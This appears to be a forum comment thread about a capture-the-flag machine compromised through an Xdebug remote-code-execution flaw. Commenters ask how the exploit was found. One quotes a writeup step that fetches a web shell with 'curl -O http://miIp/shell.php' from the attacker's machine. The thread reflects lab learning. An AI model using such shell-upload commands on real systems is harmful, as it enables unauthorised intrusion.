• Great post. When I was doing the box I never thought to use Nikto and it took me quite a while to notice that first foothold!

    Lesson learned, thanks.



    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • edited October 2018

    Thank you very much for your writeups.

    May I ask you 2 questions:

    ..........Question 1:

    I wonder what keywords in Google you used to find this link:

    I tried these keywords in Google without success.
    xdebug exploit
    xdebug exploit shell
    xdebug exploit rce
    xdebug exploit repository
    xdebug vulnerabilities
    xdebug php exploit

    ..........Question 2 has 2 sub questions:

    You wrote in your writeup:

    ./ -u

    We upload a shell; from the obtained shell:

    curl -O http://miIp/shell.php

    ..........Is this "" the code copied from

    ..........I guess
    the IP address of my Kali Linux?

    Please advise.

    Thanks a million.

  • I guess the keywords to search on google were:

    php debug rce

Sign In to comment.